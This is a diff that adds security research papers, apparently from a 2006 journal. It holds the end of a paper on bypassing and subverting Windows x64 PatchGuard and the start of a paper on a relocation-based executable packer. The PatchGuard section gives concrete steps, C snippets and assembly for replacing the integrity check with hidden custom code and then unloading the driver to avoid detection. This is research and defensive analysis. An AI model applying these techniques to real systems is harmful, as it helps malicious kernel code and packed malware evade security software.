transparent +to PatchGuard. + +The most logical defense for this approach is to attempt to detect a +compromise in the page fault dispatching path. Because TLB desynchronization +cannot in general be used to hide the page fault handler itself (the page +fault handler must remain marked present in memory), it would be difficult for +a third party to conceal the alteration to the page fault handler from the +kernel. This difficulty would be expressed in a limited number of ways in +which alterations to the page fault handler could be hidden, such as by clever +utilization of debug registers. As a result, the key to preventing this +technique from remaining viable is to develop a way for PatchGuard to detect +the page fault hook. If, for example, the debug trap handler and a debug +breakpoint on the page fault handler were used to gain control on a page +fault, then Microsoft might be able to prevent this technique by blocking or +detecting the interception of the debug trap handler. One such approach might +be to better secure PsInvertedFunctionTable, which represents an easy way for +a third party to subvert the debug trap handler without PatchGuard's +knowledge. Such counters will vary based on the mechanism used to hide the +page fault handler hook, however. + +4.9) DPC Routine Patching + +A variation on technique 4.2, a very simple-minded approach to disabling +PatchGuard would be to simply hook every possible DPC routine, check if the +DPC is probably being called in order to execute PatchGuard's system integrity +check, and if so, simply returning from the DPC to the kernel timer DPC +dispatcher. In order to implement this approach, one first needs to locate +each possible DPC routine. Technique 4.2 lists a number of viable algorithms for +fingerprinting (and locating) each DPC routine; any (preferably multiple) of +the suggested algorithms in that technique would be directly applicable to +this proposed approach. + +After one has identified all the possible DPC routines, all that is left is to +patch each one to branch to driver controlled code. From there, the driver +could make the decision as to whether the DPC is being invoked legitimately, +or whether it is being invoked as part of PatchGuard's system integrity check +process (easily identified by a non-canonical kernel address being passed as +DeferredContext). If the DPC is PatchGuard-related, then all the driver need +do to block PatchGuard is to immediately return to the DPC dispatcher. + +This approach is fairly trivial to prevent (from Microsoft's point of view). +Because it is signature-based, one possible counter-approach Microsoft could +implement would be determining which signatures third party drivers use to +detect PatchGuard DPCs, and altering the PatchGuard DPC routines to not match +those signatures in the next PatchGuard version. Microsoft could also change +the number of DPC routines to throw off drivers that assume PatchGuard will +use exactly ten DPCs, or Microsoft could switch to an alternative delivery +mechanism other than DPCs in order to prevent existing code that detects and +hooks specific DPC routines from blocking PatchGuard. + +5) Subverting PatchGuard + +PatchGuard currently possesses a formidable array of defensive mechanisms that +are aimed at making it difficult to reverse engineer and debug. Given that +Microsoft does not currently have in place the infrastructure to make +PatchGuard enforced by hardware, this is arguably the best that Microsoft will +ever really be able to do in the short term. They're only able to build a +system that is based on obfuscation and anti-debugging techniques in an +attempt to make it difficult for third parties to detect, disable, or bypass +it. + +There are other classes of software that seek to create defenses similar to +those of PatchGuard's. However, these other classes usually have far more +nefarious purposes than preventing third parties from patching the kernel. +Specifically, anti-debugging, anti-reverse-engineering, and self-decrypting +code have often used been to hide viruses, rootkits, and other malicious +software on compromised systems. + +Although Microsoft may have intended the defensive mechanisms employed by +PatchGuard for an (arguably) good cause, these same anti-debugging, +anti-detection, and anti-reverse-engineering techniques that protect +PatchGuard from attack by third party drivers can also be subverted to protect +custom code from detection or analysis by anti-virus or anti-rootkit software. +With this respect, Microsoft has created a double-bladed-sword, as the same +elaborate obfuscation and anti-debugging schemes that guard PatchGuard against +third party software can also be used to guard malicious software from system +security software. It is in fact quite possible to subvert PatchGuard version +2's myriad defenses to execute custom code instead of PatchGuard's system +integrity check routine. While doing so might not be exactly called trivial, +it is far from impossible. + +In order to subvert PatchGuard to do one's bidding, one must first catch +PatchGuard in the act, so to speak. To accomplish this, the author recommends +turning to one of the proposed bypass techniques as a starting place. For +example, consider the first proposed bypass technique, wherein the author +recommends hooking _C_specific_handler to intercept control of execution at +the exception generated by the PatchGuard DPC routine in order to trigger +execution of the system integrity check. An implementation of this bypass +technique provides direct access to the machine context inside the PatchGuard +DPC routine, and this machine context contains the information necessary to +locate the PatchGuard system integrity check routine. + +Since the objective is to repurpose the system integrity check routine to +execute custom code, this is a good starting point. However, determining the +location of the system integrity check routine is much more involved than +simply skipping over PatchGuard's checks entirely; the pointer to the routine +in question is encrypted based off of the original arguments to the DPC (the +Dpc and DeferredContext arguments). Additionally, the original arguments to +the PatchGuard DPC have at this point already been moved from registers to the +stack and obfuscated (rotated left or right by a magical constant). As the +original contents of the argument registers are deliberately overwritten by +the DPC routine before the access violation is triggered, there is no choice +other than to somehow fish the DPC arguments out of the caller's stack. This +is actually somewhat of a challenge, given that such an approach must work for +all kernel versions, and must also work for all of the different DPC +permutations. Since this set of possibilities represents an unmaintainably +large number of routines to reverse engineer in order to determine rotate +obfuscation values and stack offsets, a more generalized approach to locating +the original arguments on the stack must be taken. In order to create such a +generic approach, one must take a closer look at the first few instructions of +each DPC routine (leading up to the intentional access violation). Although +PatchGuard has put into place several barriers to prevent easy retrieval of +the original arguments from this context, there might be a pattern or weakness +that could be exploited in order to recover the arguments in question. + +The basic things common to each DPC routine, when it comes to the machine +context at the time of the access violation, are: + + 1. The original arguments have been stored on the stack in an obfuscated + form (rotated left or right by an arbitrary magical constant). + + 2. The access violation always occurs by dereferencing rax. Here, rax is + always the deobfuscated form of the DeferredContext argument. This gives us + one of the arguments for free, as rax in the register context at the time of + the access violation is always the plaintext DeferredContext value. + + 3. The stack location where the Dpc argument is stored at varies greatly + between DPC version to DPC version. Furthermore, it also varies between + different kernel flavors within an operating system family, and between + operating system families. As a result, it is not practical to hardcode stack + displacements for this argument. + + 4. The instruction immediately prior to the faulting instruction is always + an instruction in the form of ror rax, . Here, the magical + constant is an immediate value, which means that it is encoded as a part of + the opcode for this instruction itself. Each DPC has its own unique magical + constant, and the magical constants used do not change for a particular DPC + flavor across all kernel flavors and operating system families. This gives us + a nice way to quickly identify which of the ten PatchGuard DPCs is in use from + the context of the _C_specific_handler hook (without having to do ugly code + fingerprinting or analysis). Unfortunately, we still don't have a way to + determine the stack displacement of the Dpc argument. + + 5. The r8 register is always equal to the original Dpc argument, shifted + right by the low byte of the DeferredContext argument. Although this may seem + tantalizingly close to what we're looking for, it can't actually be used as a + substitute for the original Dpc argument, even though the DeferredContext + argument is known here (due to the value of rax). This is because the right + shift operation is destructive, in that information is permanently lost as + bits are shifted right off of the register into oblivion. As a result, + depending on the low byte of the DeferredContext argument, important bits in + the Dpc argument have already been permanently lost in the pseudo-copy + residing in r8. + +Although the situation may initially appear grim, it is in fact still possible +to locate the Dpc argument given the above information; all that is needed is +a bit of work (and getting one's hands dirty with some ugly tricks). +Specifically, it is possible to search the stack frame of the DPC routine for +the Dpc argument with a brute-force attack. This isn't exactly elegant, but +it gets the job done. There are a number of hints that can be used to +increase the chance of successfully finding the real Dpc argument on the +stack: + + 1. The stack is 8-byte aligned (at least) due to x64 calling convention + requirements, and the Microsoft C/C++ compiler will always place pointer-sized + values on the stack in 8-byte-aligned locations. As a result, the search can + be narrowed down to 8-byte-aligned locations on the stack, instead of a + bytewise search. + + 2. Because the identity of the current DPC routine is known (due to + analyzing the ror instruction immediately preceding the faulting mov eax, + [rax] instruction), the rotate constant used to obfuscate the Dpc argument is + known. Each DPC routine has its own unique magical rotate constant, and as + the current DPC routine has been positively identified, the rotate constant + used to obfuscate the Dpc argument on the stack is thus also known. + + 3. A quick check as to whether a value on the stack could possibly be the + Dpc argument can be made by rotating the value on the stack by the known + obfuscation constant, then shifting the value right by the low byte in the + DeferredContext argument and comparing the result to the r8 value at the time + of the exception. If there is a mismatch, then the current stack location can + be eliminated from the search. This does not provide a positive match, but it + does provide a way to positively eliminate possibilities. This step is also + optional, in that it is still possible to locate the Dpc argument without + relying on r8; the check against r8 is simply an optimization. + + 4. The Dpc argument should point to a valid non-paged pool address, given + that it must represent a valid kernel pointer. In order to check that this is + the case, MmIsAddressValid can be used to test whether the deobfuscated value + in question is a valid pointer or not. (Yes, MmIsAddressValid is a bit of a + race condition and certainly a hack. The author would like to note that this + approach was described as requiring that the implementor get his or her + ``hands dirty with some ugly tricks'', in an attempt to forstall the + inevitable complaints about how this approach might be decried as an + unstomachable ugly hack by some.) + + 5. The Dpc argument should point to a valid non-paged pool address whose + length is great enough to contain a KDPC object, plus at least one + pointer-sized additional field. A secondary MmIsAddressValid test can be used + to verify that the pointer describes a valid region large enough to contain + the KDPC object, plus the additional pointer-sized field following it (the + PatchGuard decryption key). + + 6. The Dpc argument should point to a DPC whose Type and DeferredContext + arguments have been zeroed. (The DPC routine intentionally zeros these values + in the DPC before intentionally triggering an access violation.) If the + suspected Dpc argument, when treated as a PKDPC, does not have these + properties then it can be eliminated as a possibility. + +By repeatedly applying these rules to every applicable location within a +reasonable distance upward from the rsp value at the time of the exception +(say, 256 bytes, although the exact size can be greater; the only requirement +is that the entire local variable space of the DPC routine with the largest +local variable space is completely contained within the search region), it is +possible to recover the Dpc argument with virtual certainty. In the author's +experience, this technique works quite reliably, despite that one might intuit +that a search of an unknown stack frame might be prone to failing or turning +up false positives. + +After both the Dpc and DeferredContext arguments to the PatchGuard DPC routine +have been recovered, it is a simple matter of analyzing how PatchGuard invokes +the system integrity check in order to determine how to locate it in-memory. +This has been discussed previously, and it amounts to the following set of +statements: + +ULONG64 DecryptionKey, PatchGuardCheckFunction; + +DecryptionKey = *(PULONG64)(Dpc + 0x40); +PatchGuardCheckFunction = DecryptionKey ^ DeferredContext; +PatchGuardCheckFunction |= 0xFFFFF80000000000; + +At this point, it's almost possible to replace the system integrity check +routine with custom code. However, there is still the matter of the pesky +self-decrypting stub that runs before the check function. Because the DPC +routine's exception handler rewrites the first instruction of the stub before +it is executed, one doesn't have a whole lot of choice but to implement at +least a very basic version of the decryption stub for the system integrity +check routine. + +Recall that the first instruction in the stub is set to the following: + +lock xor qword ptr [rcx],rdx + +Looking at the prototype for the decryption stub, rcx corresponds to the +address of the decryption stub itself, and rdx corresponds to the decryption +key. Since this instruction modifies both itself and the next instruction +(the instruction is four bytes long and the xor alters eight bytes), the +replacement code for the system integrity check routine must allow the first +instruction to be the above xor instruction, and the must allow for the second +instruction (at a minimum) to be initially xor-obfuscated. For simplicity's +sake, the author has chosen to implement the simplest possible solution to +this conundrum, which is to make the second instruction in the replacement +code a duplicate of the first instruction. In other words, the replacement +code would read as follows: + +; +; This instruction is forced on us by PatchGuard, +; and cannot be altered; it is rewritten at runtime. +; + +lock xor qword ptr [rcx],rdx + +; +; The next instruction, conveniently four bytes +; long, re-encrypts itself by xoring the first +; eight bytes of the decryption stub (which includes +; the second instruction) by the decryption key a +; second time; +; + +lock xor qword ptr [rcx],rdx + +; +; (... any custom code may follow here ...) +; + +As noted previously, after specially constructing the replacement code, it is +necessary to initially encrypt the second instruction (as it will be +immediately decrypted by the first instruction). This must be done before +control is returned to PatchGuard. + +After the custom code is configured and the second instruction is encrypted, +all that remains is to copy the custom code over the PatchGuard decryption +stub. When this is accomplished, the PatchGuard DPC's exception handler will +invoke the supplied custom code instead of the system integrity check routine. + +However, this is not really all that interesting due to the fact that +PatchGuard utilizes a one-shot timer. The custom code that was substituted +for the decryption stub will never be run again. To account for this fact, it +would be prudent to place a call to queue a timer with an associated DPC +routine (pointing to the DPC routine that PatchGuard selected at boot) within +the custom code block. + +At this point, it is possible to simply allow the normal exception dispatching +process to continue (i.e. to resume _C_specific_handler), after which the +custom code will be invoked instead of PatchGuard. In essence, PatchGuard has +been not only disabled, but completely subverted to call customized code under +the control of a third party driver instead of the system integrity check. + +Still, the situation is less than optimal. Presently, there is still a hook +in _C_specific_handler that is there for anyone to see (and recognize that +someone has tampered with the kernel). Additionally, the driver that was used +to subvert PatchGuard in the first place is still loaded, which may also be a +tell-tale giveaway sign that someone may have done something unsavory to the +kernel. + +These problems are also solvable, however. It turns out that after PatchGuard +has been subverted, it is safe to unhook from _C_specific_handler, and then +simply call back into _C_specific_handler after the hook is removed. +Furthermore, everything necessary to run the subverted system integrity check +routine could even reside within PatchGuard's own internal data structures; +for example, one could simply utilize extra space after the custom code, where +the decryption stub and PatchGuard check routine would normally reside as a +parameter block. This is especially convenient, as the custom code block is +given a pointer to itself in rcx (the first argument), and it is easy to add a +known constant value to that pointer in order to retrieve the parameter block +for the custom code. At this point, all of the code and data necessary for +the custom code that the driver has subverted PatchGuard with is located in +dynamically allocated memory. Given this, the original driver is no longer +needed and can even be unloaded (so as to further disguise the fact that any +alterations to the kernel have taken place). After the driver has been +unloaded, the only traces of the alterations that have taken place would be +the unloaded module list (easily modified), and the re-written PatchGuard +system integrity routine itself (which could easily be bolstered to be +self-decrypting (with a differing encryption key in order to make for an +extremely difficult to locate target in-memory). + +The end result is that PatchGuard has been disabled, and in its place, +arbitrary custom code is periodically executed. Furthermore, no modifications +or patches to kernel code or global data are present and no suspicious drivers +(or even suspicious extraneous memory allocations) remain present in memory. +In essence, the only traces of the fact that PatchGuard has been subverted +would be visible only to someone (or something) that knows how to locate and +disable PatchGuard. + +The supplied example program for subverting PatchGuard is fairly simple, and +it does not utilize all of the defensive technologies employed by PatchGuard. +For instance, it does not change the decryption key on every execution, nor +does it follow through with keeping the entire code block encrypted except +just before execution. These features could be easily added, however, and +would greatly increase the difficulty of locating the subverted PatchGuard +code in memory. + +6) Future Direction of PatchGuard and ``Anti-Hack'' Systems + +In the future, there are a couple of generalized approaches that Microsoft +could take to significantly strengthen PatchGuard against attack. +Specifically, these involve adding redundancy and removing single points of +failure from PatchGuard. It is often helpful to look at an anti-hack system +like PatchGuard as a critical system that one would like to keep running at +all times with minimal downtime (i.e. a network or service with +high-availability). The logical way to accomplish that goal is to locate and +eliminate single points of failure, such as by adding redundancy. In a high +availability network, one would accomplish this by adding redundant cables, +switches, and the like, such that if one component were to fail, the system as +a whole would continue to operate instead of failing entirely. With an +anti-hack system such as PatchGuard, it is helpful to add redundancy to all +critical code paths such that there is no single point where an attacker can +simply change an opcode or hook in with the end result of disabling the entire +anti-hack system. + +Removing these single points of failure is critical to the longevity of an +anti-hack system. The main concept to grasp in such cases is that the +attacker will always try to seek out the easiest way to break the defenses of +the target system. All the obfuscation and encryption in the world does +little good if an attacker can simply change a jmp to a nop and prevent +elaborate encryption and anti-debugging facilities from ever getting the +chance to run. In this respect, PatchGuard is flawed in its current +implementation. There are many different single points of failure where an +attacker could inject themself at a single place and completely disrupt +PatchGuard. + +One possible solution to this problem might be to ensure that there are +multiple different code paths that can lead to every point in the PatchGuard +system integrity check. The nature of the battle between anti-hack systems +and attackers relates to how easy it is to bypass the weakest link in the +anti-hack system. Until all of the weak links in the system are shored up +simultaneously, the system remains much more vulnerable to easy attack or +bypass. With this respect, PatchGuard version 2 does little to improve on the +weakest links of the system and as such there are still a vast number of ways +to bypass it. Even worse, each bypass technique is often only required to +attack one specific aspect of PatchGuard in order to disable it as a whole. + +As far as PatchGuard itself is concerned, one approach that Microsoft could +take to significantly increase the resiliency and robustness of the system to +outside interference would be to merge some sort of critical system +functionality with the PatchGuard system integrity check. Such an approach +would make it difficult for a would-be attacker to simply bypass a call to +PatchGuard, as doing so would also bypass some sort of critical system +functionality that would (ideally) be required for the system to operate in +any usable capacity. At this point, the challenge for attackers then turns +into either replicating the critical system functionality that is contained +within PatchGuard, finding a way to split the critical system functionality +away from the system integrity check portions of PatchGuard, or finding a way +to evade PatchGuard's detection of kernel patching entirely. Microsoft can +make the first two points arbitrarily difficult, especially since the +knowledge of Windows internals is presumably greater inside Microsoft than +outside Microsoft. The incorporation of critical system functionality would be +theoretically easier for Microsoft to do than it would be for would-be +attackers to reliably reverse engineer and re-implement such functionality on +their own, forcing would-be attackers to take the hard route of trying to +separate PatchGuard from critical system functionality. This is where clever +use of obfuscation and anti-debug techniques would really see maximum +effectiveness, as an attacker would (optimally) have no choice other than to +step through and understand PatchGuard entirely before being able to replicate +the critical functionality contained within PatchGuard (or selectively +activate the critical functionality without activating the system integrity +check). + +The latter problem (evading PatchGuard detection entirely) is likely to be a +much more difficult one to tackle, however. Techniques such as the clever use +of debug registers, TLB desynchronization, and other related attacks are +extremely difficult to detect (and typically very easy to alter to avoid +detection after a known detection scheme for such attacks is developed). In +this particular respect, Microsoft is presently at a great disadvantage. +Improving PatchGuard to avoid such evasion tactics is likely to prove both +difficult and a poor investment of time relative to how quickly attackers can +adapt and compensate for Microsoft's efforts at bolstering PatchGuard's +capabilities. + +Looking towards the future, it can be expected that PatchGuard will ultimately +see the obfuscation-based defensive mechanisms currently in place substituted +with hardware-based defensive mechanisms. In particular, the author expects +that Microsoft will eventually deploy a PatchGuard version that is augmented +by the hardware-based virtualization (also known as hypervisor) support +present in recent processors (and being developed for Windows Server +``Longhorn'', code-named ``Viridian''). An implementation of PatchGuard that +is guarded by a hypervisor would be immune to being simply patched out of +existence (which eliminates some of the most significant flaws in current +versions of PatchGuard), at least as long as the hypervisor itself remains +secure and free from exploitable bugs. In a hypervisor-based system with +PatchGuard, third party drivers would not be permitted to execute with +hypervisor privileges, thus completely preventing runtime patching of +PatchGuard itself (which would be a part of the privileged hypervisor layer). +A hypervisor-based system might also be able to implement concepts such as +write-once memory that could be adapted to prevent the kernel from being +patched in the first place once it is initially loaded into memory (as opposed +to detecting patching after the fact, and bringing down the system in response +to third party drivers performing underhanded deeds). + +Even with hypervisor support in-place, however, it is anticipated that there +will still be ways for third parties to alter the behavior of the kernel in +ways not completely authorized by Microsoft. For instance, as long as support +for debug registers must be retained in order for the kernel debugger to +function, it may be difficult to prevent an approach that utilizes debug +registers to modify execution context at arbitrary locations within the kernel +(at least, not without making the hypervisor completely responsible for +managing all activities relating to the processor's complement of debug +registers). + +7) Conclusion + +Although PatchGuard version 2 introduces significant improvements in some +areas, it still remains vulnerable to a wide variety of potential attacks. +Additionally, it is possible (though involved) to subvert PatchGuard entirely, +with the purpose of running arbitrary custom code in a difficult-to-detect +manner in the place of PatchGuard. + +With these points in mind, it is perhaps time to re-evaluate whether +PatchGuard, in its current incarnation, is really worth all the trouble that +Microsoft has put into it. Although forcing the IHV and ISV world to clean +house with their kernel mode code is certainly a reasonable goal (and one +which ultimately benefits all Windows customers, no matter how certain +companies with poorly written kernel mode code [8] may care to spin the facts), +as badly written kernel mode code results in the chronic instability that +Windows is often associated with (at best), and privilege escalation and +arbitrary code execution exploits in the worst case. However, there are still +significant counterpoints to what PatchGuard represents; the fact that it may +provide a convenient way for malicious kernel mode code to hide in a very +difficult to detect manner, and that there is real innovation that is stifled +by the restrictions that PatchGuard places on the system. As an example of +the latter, consider that Microsoft's very own Virtual Server 2005 R2 SP1 +(Beta) runs afoul of PatchGuard and requires a special kernel hotfix to alter +what, exactly, PatchGuard protects in order to run without bugchecking the +system with the infamous CRITICAL_STRUCTURE_CORRUPTION bugcheck made famous by +PatchGuard [3]. This alone should be taken as an indicator that there *are* in +fact legitimate uses for some of the techniques that PatchGuard prevents, +despite Microsoft's insistence to the contrary. It should also be noted that +despite Microsoft's statements that no exceptions would be made for PatchGuard +[1], they have had to make adjustments at least once for their own code to run on +PatchGuard. The conspiracy theorists among you might wonder whether Microsoft +would be so gracious as to make such exemptions for legitimate uses of +techniques blocked by PatchGuard for third party software with similar needs +as Virtual Server 2005 R2 SP1, given their pointed statements to the contrary. + +As a final note relating to the objectives of PatchGuard, even with hypervisor +technology deployed (and furthermore, even with so-called immutable memory as +implemented by a hypervisor), there is little that can be done to protect +drivers from each other, as even in a hypervisor based system (where the +kernel itself is protected from drvers), interdependent drivers will still be +able to interfere with eachother so long as they co-exist in the same domain. +This is particularly problematic in Windows, given the concepts of device +stacks and device interfaces that allow drivers to directly interact with +eachother in a variety of ways. It will be difficult to ensure that drivers do +not resort to patching eachother (or modifying pool allocations instead of +patching code, in the case where immutable memory on code regions is being +enforced by a hypervisor). Depending on what the objectives of a third party +ISV attempting to bypass PatchGuard are, it may be possible to simply patch +drivers (such as Ntfs.sys or Tcpip.sys) in lieu of patching the kernel. From +this perspective, it is unlikely that Windows will ever become an environment +where kernel mode drivers are completely isolated and unable to interfere with +eachother, despite the efforts of technologies such as PatchGuard. + +Microsoft has already started down a path that may eventually lead to a system +where buggy drivers will be unable to crash the system (or patch eachother), +with the advent of the User Mode Driver Framework (UMDF). It remains to be +seen whether isolated user-mode based drivers will become a viable alternative +for high performance devices (such as PCI/PCI Express as opposed to USB +devices), however, instead of simply being confined to a small subset of of +the devices that ship with a typical computer. The author expects that +whereever possible, Microsoft will attempt to move third party code outside of +sensitive areas (like the kernel) and into more contained locations (such as a +user-mode process). This is in-line with the purported goals of PatchGuard; +increasing system stability by preventing third party drivers from performing +questionable actions (or at least, questionable actions in such a way that +might bring down the system). + +Bibliography + +[1] Microsoft Corporation. Patching Policy for x64-Based Systems. + http://www.microsoft.com/whdc/driver/kernel/64bitpatching.mspx; + accessed December 10, 2006. + +[2] skape, Skywing. Bypassing PatchGuard on Windows x64. + http://uninformed.org/index.cgi?v=3&a=3&t=sumry; + accessed December 10, 2006. + +[3] Microsoft Corporation. Connect: Virtual Server 2005 R2 SP1 Beta. + https://connect.microsoft.com/site/sitehome.aspx?SiteID=151; + accessed December 28, 2006. + +[4] Advanced Micro Devices, Inc. AMD 64-Bit Technology + http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/x86-64_overview.pdf; + accessed December 28, 2006. + +[5] Microsoft Corporation. RtlVirtualUnwind. + http://msdn2.microsoft.com/en-us/library/ms680617.aspx; + accessed December 28, 2006. + +[6] The PaX Team. Paging Based Non-Executable Pages. + http://pax.grsecurity.net/docs/pageexec.txt; + accessed December 30, 2006. + +[7] Sherri Sparks and Jamie Butler. "SHADOW WALKER" Raising the Bar for Rootkit Detection. + http://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; + accessed December 30, 2006. + +[8] Skywing. Anti-Virus Software Gone Wrong. + http://www.uninformed.org/?v=4&a=4&t=sumry; + accessed December 31, 2006. diff --git a/uninformed/6.2.txt b/uninformed/6.2.txt new file mode 100644 index 0000000..fad0b0a --- /dev/null +++ b/uninformed/6.2.txt @@ -0,0 +1,895 @@ +Locreate: An Anagram for Relocate +skape +12/2006 +mmiller@hick.org + +1) Foreword + +Abstract: This paper presents a proof of concept executable packer +that does not use any custom code to unpack binaries at execution time. This +is different from typical packers which generally rely on packed executables +containing code that is used to perform the inverse of the packing operation +at runtime. Instead of depending on custom code, the technique described in +this paper uses documented behavior of the dynamic loader as a mechanism for +performing the unpacking operation. This difference can make binaries packed +using this technique more difficult to signature and analyze, but only when +presented to an untrained eye. The description of this technique is meant to +be an example of a fun thought exercise and not as some sort of revolutionary +packer. In fact, it's been used in the virus world many years prior to this +paper. + +Thanks: The author would like to thank Skywing, spoonm, deft, +intropy, Orlando Padilla, nemo, Richard Johnson, Rolf Rolles, Derek Soeder, +and Andre Protas for their discussions and feedback. + +Challenge: Prior to reading this paper, the author recommends that +the reader attempt to determine the behavior of the packer that was used on +the binary included in the attached code sample. The binary itself is +innocuous and just performs a few simple printf operations. + +Previous Research: This technique has been used in the virus world far in +advance of this writing. Examples that apply this technique include +W95/Resurrel and W95/Silcer. Further research indicates that Peter Szor did a +write-up on this technique entitled ``Tricky Relocations'' in the April 2001 +edition of Virus Bulletin[2,3]. + +2) Locreate + +Executable packers, such as UPX, are commonly employed by malware as a means +of delaying or otherwise thwarting the process of static analysis. Packers +also have perfectly legitimate uses, but these uses fall outside of the scope +of this paper. The reason packers make static analysis more difficult is +because they alter the form of the binary to the point that what appears on +disk is entirely different from what actually ends up executing in memory. +This alteration is typically accomplished by encapsulating a pre-existing +binary in a ``host'' binary. The algorithm used to encapsulate the +pre-existing binary in the host binary is what differs from one packer to the +next. In most cases, the host binary must contain code that will perform the +inverse of the packing operation in order to decapsulate the original binary. +The code that is responsible for performing this operation is typically +referred to as an unpacker. The process of unpacking the original binary is +usually done entirely in memory without writing the original version out to +disk. Once the original binary is unpacked, execution control is transferred +to the original binary which begins executing as if nothing had changed. + +This general approach represents an easy way of altering the form of a binary +without changing its effective behavior. In fact, it's pretty much analagous +to payload encoders that are used in conjunction with exploits to alter the +form of a payload in order to satisify some character restrictions without +changing the payload's effective behavior. In the case of payload encoders, +some arbitrary code must be prefixed to the encoded payload in order to +perform the inverse of the encoding operation once the payload is executed. +However, like payload encoders, the use of custom code to perform the inverse +of the packing or encoding operation can lead to a few problems. + +The most apparent of these problems has to do with the fact that while the +packed form of an executable may be entirely different from its original, the +code used to perform the unpacking operation may be static. In the event that +the unpacker consists of static code, either in whole or in part, it may be +possible to signature or otherwise identify that a particular packing +algorithm has been used to produce a binary and thus make it easier to restore +the original form of the binary. This ability is especially important when it +comes to attempting to heuristically identify malware prior to allowing a user +to execute it. + +The use of custom code can also make it possible for tools to be developed +that attempt to identify unpackers based on their behavior. Ero Carrera has +provided some excellent illustrations relating to the feasibility of this type +of attack against unpackers[1]. An understanding of an unpacker's behavior may +also make it possible to acquire the original binary without allowing it to +actually execute by simply tracing the unpacker up until the point where it +transfers execution control to the original binary. In the case of malware, +this weakness means that benefits gained from packing an executable can be +completely nullified. + +Both of these problems are meant to illustrate that even though custom unpacking +code is often a requirement, its mere presence exposes a potential point of +weakness. If it were possible to eliminate the custom code required to unpack +a binary, it could make the two problems described previously much more difficult +to realize. To that point, the technique described in this paper does not +rely on the presence of custom code in a packed binary in order to unpack +itself. Instead, documented behavior of the dynamic loader is used to perform +the unpacking whenever the packed binary is executed. While this approach has +its benefits, there are a number of problems with it that will be discussed +later on. In the interest of brevity, the packer described in this paper will +simply be referred to as locreate. As was already mentioned, +locreate leverages a documented feature of most dynamic loaders in order to +perform its unpacking operation. Given that the process of unpacking +typically involves transforming the original binary's contents back into its +original form, there are only a finite number of dynamic loader features that +might be abused. Perhaps the feature that is best suited for transforming the +contents of a binary at runtime is the dynamic loader feature that was +designed to do just that: relocations. + +In the event that a binary is unable to be loaded at its preferred base +address at runtime, the dynamic loader is responsible for attempting to move +the binary to another location in memory. The act of moving a binary from its +preferred base address to a new base address is more commonly referred to as +relocating. When a binary is relocated to a new base address, any references +the binary might have to addresses that are relative to its preferred base +address will no longer be valid. As such, references that are relative to the +preferred base address must be updated by the dynamic loader in order to make +them relative to the new base address. Of course, this presupposes that the +dynamic loader has some knowledge of where in the binary these address +references are made. To satisfy this presupposition, binaries will typically +include relocation information to provide the dynamic loader with a map to the +locations within the binary that need to be adjusted. When a binary does not +include relocation information, it's classified as a non-relocatable binary. +Without relocation information, a binary cannot be relocated to an alternate +base address in an elegant manner (ignoring position independent executables). + +The structures used to convey relocation information differs from one binary +format to the next. For the purpose of this paper, only the structures used +to describe relocations of Portable Executable (PE) binaries will be +discussed. However, it should be noted that the approaches described in this +paper should be equally applicable to other binary formats, such as ELF. In +fact, other binary formats make the technique used by locreate even easier. +For example, ELF supports applying relocation fixups with an addend. This +addend is basically an arbitrary value that is used in conjunction with a +transformation. The PE binary format conveys relocation information through +one of the data directories that is included within the optional header +portion of the NT header. This data directory is symbolically referred to +through the use of the IMAGE_DIRECTORY_ENTRY_BASERELOC. The base relocation +data directory consists of zero or more IMAGE_BASE_RELOCATION structures which +are defined as: + +typedef struct _IMAGE_BASE_RELOCATION { + ULONG VirtualAddress; + ULONG SizeOfBlock; +// USHORT TypeOffset[1]; +} IMAGE_BASE_RELOCATION, *PIMAGE_BASE_RELOCATION; + +The base relocation data directory is a little bit different from most other +data directories. The IMAGE_BASE_RELOCATION structures embedded in the data +directory do not occur immediately one after the other. Instead, there are a +variable number of USHORT sized fixup descriptors that separate each +structure. The SizeOfBlock attribute of each structure describes the entire +size of a relocation block. Each relocation block consists of the base +relocation structure and the variable number of fixup descriptors. Therefore, +enumeration of the base relocation data directory is best performed by using +the SizeOfBlock attribute of each structure to proceed to the next relocation +block until none are remaining. The VirtualAddress attribute of each +relocation block is a page-aligned relative virtual address (RVA) that is used +as the base address when processing its associated fixup descriptors. In this +manner, each relocation block describes the relocations that should be applied +to exactly one page. + +The fixup descriptors contained within a relocation block describe the address +of the value that should be transformed and the method that should be used to +transform it. The PE format describes about 10 different transformations that +can be used to fixup an address reference. These transformations are conveyed +through the top 4 bits of each fixup descriptor. The bottom 12 bits are used +to describe the offset into the VirtualAddress of the containing relocation +block. Adding the bottom 12 bits of a fixup descriptor to the VirtualAddress +of a relocation block produces the RVA that contains a value that needs to be +transformed. Of the transformation methods that exist, the one most commonly +used on x86 is IMAGE_REL_BASED_HIGHLOW, or 3. This transformation dictates that +the 32-bit displacement between the original base address and the new base +address should be added to the value that exists at the RVA described by the +fixup descriptor. The act of adding the displacement means that the value +will be transformed to make it relative to the new base address rather than +the original base address. To better understand how all of these things tie +together, consider the following source code example: + +#include +#include + +int main(int argc, char **argv) +{ + printf("Hello World.\n"); + + return 0; +} + +When compiled down, this function appears as the following: + +sample!main: +00401010 55 push ebp +00401011 8bec mov ebp,esp +00401013 6800104200 push offset sample!__rtc_tzz (sample+0x21000) (00421000) +00401018 e80c000000 call sample!printf (00401029) +0040101d 83c404 add esp,4 +00401020 33c0 xor eax,eax +00401022 5d pop ebp +00401023 c3 ret + +At address 0x00401013, main pushes the address of the string that contains +``Hello World!'': + +0:000> db 00421000 L 10 +00421000 48 65 6c 6c 6f 20 57 6f-72 6c 64 2e 0a 00 00 00 Hello World..... + +In this case, the push instruction is referring to the string using an +absolute address. If the sample executable must be relocated at runtime, the +dynamic loader must be provided with the relocation information necessary to +fixup the reference to the absolute address. The dumpbin.exe utility from +Visual Studio can be used to confirm that this information exists. The first +requirement is that the binary must have relocation information. By default, +all DLLs will contain relocation information, but executables typically do +not. Executables can be compiled with relocation information by using the +/fixed:no linker flag. When a binary is compiled with relocations, the +presence of relocation information is simply indicated by a non-zero +VirtualAddress and Size for the base relocation data directory. These values +can be determined through dumpbin.exe /headers: + + 26000 [ EE8] RVA [size] of Base Relocation Directory + +Since relocation information must be present at runtime, there should also be +a section, typically named .reloc, that contains the virtual mapping +information for the relocation information: + +SECTION HEADER #5 + .reloc name + 1165 virtual size + 26000 virtual address (00426000 to 00427164) + 2000 size of raw data + 24000 file pointer to raw data (00024000 to 00025FFF) + 0 file pointer to relocation table + 0 file pointer to line numbers + 0 number of relocations + 0 number of line numbers +42000040 